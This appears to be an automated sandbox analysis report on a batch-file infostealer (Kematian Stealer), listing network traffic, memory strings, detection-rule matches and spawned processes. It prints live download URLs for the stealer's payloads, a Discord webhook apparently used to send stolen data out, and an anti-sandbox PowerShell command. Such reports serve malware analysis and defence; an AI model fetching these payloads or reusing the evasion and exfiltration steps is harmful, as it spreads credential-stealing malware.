      Source: global trafficHTTP traffic detected: GET /cdn-cgi/trace HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.cloudflare.com
      Source: global trafficHTTP traffic detected: GET /Somali-Devs/Kematian-Stealer/raw/main/frontend-src/webcam.ps1 HTTP/1.1Host: github.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Somali-Devs/Kematian-Stealer/main/frontend-src/webcam.ps1 HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Somali-Devs/Kematian-Stealer/raw/main/frontend-src/kematian_shellcode.ps1 HTTP/1.1Host: github.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Somali-Devs/Kematian-Stealer/main/frontend-src/kematian_shellcode.ps1 HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Somali-Devs/Kematian-Stealer/releases/download/KematianBuild/kematian.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: github.com
      Source: global trafficHTTP traffic detected: GET /github-production-release-asset-2e65be/561131198/03bdc8a9-2834-4aef-a1a7-2d28a7226bb3?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20240703%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240703T160852Z&X-Amz-Expires=300&X-Amz-Signature=bf5d6ce3b3c7757c8874a64bc623be15306ed51e51b0852229d79eee9986e509&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=561131198&response-content-disposition=attachment%3B%20filename%3Dkematian.bin&response-content-type=application%2Foctet-stream HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: objects.githubusercontent.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: ip-api.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /json HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: ip-api.com
      Source: global trafficDNS traffic detected: DNS query: raw.githubusercontent.com
      Source: global trafficDNS traffic detected: DNS query: www.cloudflare.com
      Source: global trafficDNS traffic detected: DNS query: ip-api.com
      Source: global trafficDNS traffic detected: DNS query: github.com
      Source: global trafficDNS traffic detected: DNS query: objects.githubusercontent.com
      Source: svchost.exe, 0000001B.00000002.2541749717.0000023F50600000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
      Source: svchost.exe, 0000001B.00000003.1466607958.0000023F504C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
      Source: powershell.exe, 0000001F.00000002.1614835648.000002B3C102D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://github.com
      Source: powershell.exe, 0000000C.00000002.1337478042.0000020A570A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
      Source: powershell.exe, 00000019.00000002.2548122352.00000236B24D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
      Source: powershell.exe, 00000019.00000002.2548122352.00000236B1AD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/json
      Source: powershell.exe, 00000019.00000002.2548122352.00000236B1AD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
      Source: powershell.exe, 0000000C.00000002.1360562547.0000020A661C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1614835648.000002B3C1317000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1672707734.000002B3CFA90000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1672707734.000002B3CFBD3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
      Source: powershell.exe, 0000001F.00000002.1614835648.000002B3BFC51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
      Source: powershell.exe, 0000001F.00000002.1614835648.000002B3C1068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://raw.githubusercontent.com
      Source: powershell.exe, 0000000C.00000002.1337478042.0000020A56378000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2548122352.00000236B1AD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
      Source: powershell.exe, 0000000C.00000002.1337478042.0000020A56151000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2548122352.00000236B17A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1614835648.000002B3BFA21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: powershell.exe, 0000000C.00000002.1337478042.0000020A56378000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2548122352.00000236B1AD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
      Source: powershell.exe, 0000001F.00000002.1614835648.000002B3BFC51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
      Source: powershell.exe, 0000001F.00000002.1684520069.000002B3D825A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microscom/pkiops/certs/MicWinProPCA2011_2011-10-19.crt0
      Source: powershell.exe, 0000000C.00000002.1366435066.0000020A6E439000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.
      Source: powershell.exe, 0000000C.00000002.1337478042.0000020A56151000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2548122352.00000236B17A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1614835648.000002B3BFA21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
      Source: powershell.exe, 00000019.00000002.2548122352.00000236B24D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
      Source: powershell.exe, 0000000C.00000002.1337478042.0000020A57780000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelpX
      Source: powershell.exe, 0000001F.00000002.1672707734.000002B3CFBD3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
      Source: powershell.exe, 0000001F.00000002.1672707734.000002B3CFBD3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
      Source: powershell.exe, 0000001F.00000002.1672707734.000002B3CFBD3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
      Source: powershell.exe, 00000019.00000002.2548122352.00000236B17A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/1245964468803076146/sUQk99W99wQnOZBfrCW8tRsn0TetpTuD0yNK0N7xwUeiPnw
      Source: svchost.exe, 0000001B.00000003.1466607958.0000023F50519000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
      Source: svchost.exe, 0000001B.00000003.1466607958.0000023F504C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
      Source: powershell.exe, 0000001F.00000002.1614835648.000002B3C1028000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1614835648.000002B3C0D64000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com
      Source: powershell.exe, 00000019.00000002.2548122352.00000236B1AD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/ChildrenOfYahweh/Kematian-Stealer/raw/main/frontend-src/blockhosts.ps1
      Source: powershell.exe, 0000001F.00000002.1614835648.000002B3BFC51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
      Source: powershell.exe, 00000019.00000002.2548122352.00000236B3B6B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2548122352.00000236B24D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2548122352.00000236B41EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2548122352.00000236B2ED9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Somali-Devs/Kematian-Stealer
      Source: powershell.exe, 00000019.00000002.2548122352.00000236B1AD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/antivm.ps1
      Source: powershell.exe, 00000022.00000002.1813354254.000001DF01C62000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.1817228535.000001DF03C68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/kematian_shellcode.ps1
      Source: powershell.exe, 0000001F.00000002.1614835648.000002B3C10C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/webcam.ps1
      Source: powershell.exe, 00000022.00000002.1817228535.000001DF03DB9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Somali-Devs/Kematian-Stealer/releases/download/KematianBuild/kematian.bin
      Source: powershell.exe, 00000019.00000002.2548122352.00000236B1AD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/TheWover
      Source: powershell.exe, 0000001F.00000002.1614710013.000002B3BE276000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/somali-devs/kematian-stealer/raw/main/frontend-src/webcam.ps1
      Source: powershell.exe, 0000001F.00000002.1614835648.000002B3C10C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/stefanstranger/PowerShell/blob/master/Get-WebCamp.ps1
      Source: powershell.exe, 0000000C.00000002.1337478042.0000020A569FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1337478042.0000020A57780000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1337478042.0000020A570A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1614835648.000002B3C0651000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
      Source: powershell.exe, 0000000C.00000002.1360562547.0000020A661C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1614835648.000002B3C1317000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1672707734.000002B3CFA90000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1672707734.000002B3CFBD3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
      Source: mshta.exe, 00000018.00000002.1493073987.00000216660D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.git
      Source: powershell.exe, 0000001F.00000002.1614835648.000002B3C1052000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com
      Source: mshta.exe, 00000018.00000002.1493073987.00000216660D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/C$&m
      Source: mshta.exe, mshta.exe, 00000018.00000002.1493073987.00000216660D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/ChildrenOfYa
      Source: powershell.exe, 00000019.00000002.2548122352.00000236B17A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1
      Source: powershell.exe, 00000019.00000002.2548122352.00000236B1AD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/Somali-Devs/Kematian-Stealer/main/frontend-src/injection.js
      Source: powershell.exe, 00000019.00000002.2548122352.00000236B1AD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/Somali-Devs/Kematian-Stealer/main/frontend-src/main.ps1
      Source: powershell.exe, 0000001F.00000002.1614835648.000002B3C1052000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/Somali-Devs/Kematian-Stealer/main/frontend-src/webcam.ps1
      Source: powershell.exe, 00000019.00000002.2548122352.00000236B1AD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com
      Source: powershell.exe, 00000019.00000002.2548122352.00000236B1AD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/cdn-cgi/trace
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
      Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
      Source: unknownHTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.7:49711 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.16.123.96:443 -> 192.168.2.7:49715 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.7:49720 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.7:49721 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.7:49722 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.7:49723 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.7:49725 version: TLS 1.2

      Key, Mouse, Clipboard, Microphone and Screen Capturing

      barindex
      Yara detected PowerShell ScreenShot
      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7696, type: MEMORYSTR

      System Summary

      barindex
      Malicious sample detected (through community Yara rule)
      Source: amsi64_7696.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
      Source: amsi64_7696.amsi.csv, type: OTHERMatched rule: Detects PowerShell PoshWiFiStealer Author: ditekSHen
      Source: sslproxydump.pcap, type: PCAPMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
      Source: 00000022.00000002.2017068494.000001DF1C3C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
      Source: 00000022.00000002.1852694281.000001DF13ACC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
      Source: 00000022.00000002.1817228535.000001DF03E22000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
      Source: 00000022.00000002.1852694281.000001DF13F87000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
      Source: 00000019.00000002.2548122352.00000236B1AD9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
      Source: Process Memory Space: powershell.exe PID: 7696, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
      Source: Process Memory Space: powershell.exe PID: 7696, type: MEMORYSTRMatched rule: Detects AMSI bypass pattern Author: ditekSHen
      Source: Process Memory Space: powershell.exe PID: 7696, type: MEMORYSTRMatched rule: Detects PowerShell PoshWiFiStealer Author: ditekSHen
      Found large BAT file
      Source: thegreatestexecutor.batStatic file information: 3533346
      Writes or reads registry keys via WMI
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_000001DF1C78D4BF NtCreateSection,NtMapViewOfSection,NtUnmapViewOfSection,NtMapViewOfSection,34_2_000001DF1C78D4BF
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_000001DF1C78D4DC NtMapViewOfSection,34_2_000001DF1C78D4DC
      Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_00007FFAAC5010FA31_2_00007FFAAC5010FA
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_000001DF1C78D4BF34_2_000001DF1C78D4BF
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_000001DF1C78DEB034_2_000001DF1C78DEB0
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_000001DF1D31238034_2_000001DF1D312380
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_000001DF1D2D1BC034_2_000001DF1D2D1BC0
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_000001DF1D2DA3C034_2_000001DF1D2DA3C0
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_000001DF1D2CDA0034_2_000001DF1D2CDA00
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_000001DF1D2DE28034_2_000001DF1D2DE280
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_000001DF1D2EA54034_2_000001DF1D2EA540
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_000001DF1D2C55E034_2_000001DF1D2C55E0
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_000001DF1D2E1C8034_2_000001DF1D2E1C80
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_000001DF1D2FC74034_2_000001DF1D2FC740
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_000001DF1D2E91E034_2_000001DF1D2E91E0
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_000001DF1D2C786034_2_000001DF1D2C7860
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_000001DF1D30C88034_2_000001DF1D30C880
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_000001DF1D2DE8C034_2_000001DF1D2DE8C0
      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
      Source: amsi64_7696.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
      Source: amsi64_7696.amsi.csv, type: OTHERMatched rule: MALWARE_Win_PWSH_PoshWiFiStealer author = ditekSHen, description = Detects PowerShell PoshWiFiStealer
      Source: sslproxydump.pcap, type: PCAPMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
      Source: 00000022.00000002.2017068494.000001DF1C3C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
      Source: 00000022.00000002.1852694281.000001DF13ACC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
      Source: 00000022.00000002.1817228535.000001DF03E22000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
      Source: 00000022.00000002.1852694281.000001DF13F87000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
      Source: 00000019.00000002.2548122352.00000236B1AD9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
      Source: Process Memory Space: powershell.exe PID: 7696, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
      Source: Process Memory Space: powershell.exe PID: 7696, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_AMSI_Bypass author = ditekSHen, description = Detects AMSI bypass pattern
      Source: Process Memory Space: powershell.exe PID: 7696, type: MEMORYSTRMatched rule: MALWARE_Win_PWSH_PoshWiFiStealer author = ditekSHen, description = Detects PowerShell PoshWiFiStealer
      Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winBAT@41/53@5/6
      Source: C:\Windows\System32\cmd.exeFile created: C:\Users\user\Desktop\kdotzASik.batJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7704:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6128:120:WilError_03
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jcs3himz.ui1.ps1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\da47f2f14fb1f90922d6d87924aada220dc001776e323526b0f1c3bc763a6b7fAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
      Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\thegreatestexecutor.bat" "
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
      Source: C:\Windows\System32\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32
      Source: powershell.exe, 00000022.00000002.2055247149.000001DF1CB60000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
      Source: powershell.exe, 00000022.00000002.2055247149.000001DF1CB60000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
      Source: powershell.exe, 00000022.00000002.2055247149.000001DF1CB60000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
      Source: powershell.exe, 00000022.00000002.2055247149.000001DF1CB60000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
      Source: powershell.exe, 00000022.00000002.2055247149.000001DF1CB60000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
      Source: powershell.exe, 00000022.00000002.2055247149.000001DF1CB60000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
      Source: powershell.exe, 00000022.00000002.2055247149.000001DF1CB60000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
      Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\thegreatestexecutor.bat" "
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i "echo" "C:\Users\user\Desktop\thegreatestexecutor.bat"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if((gcim Win32_PhysicalMemory | measure -Property capacity -Sum).sum /1gb -lt 4) {spps -f -n 'cmd' -ErrorAction SilentlyContinue;exit 1}"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i "echo" "C:\Users\user\Desktop\thegreatestexecutor.bat"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i "echo" "C:\Users\user\Desktop\thegreatestexecutor.bat"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
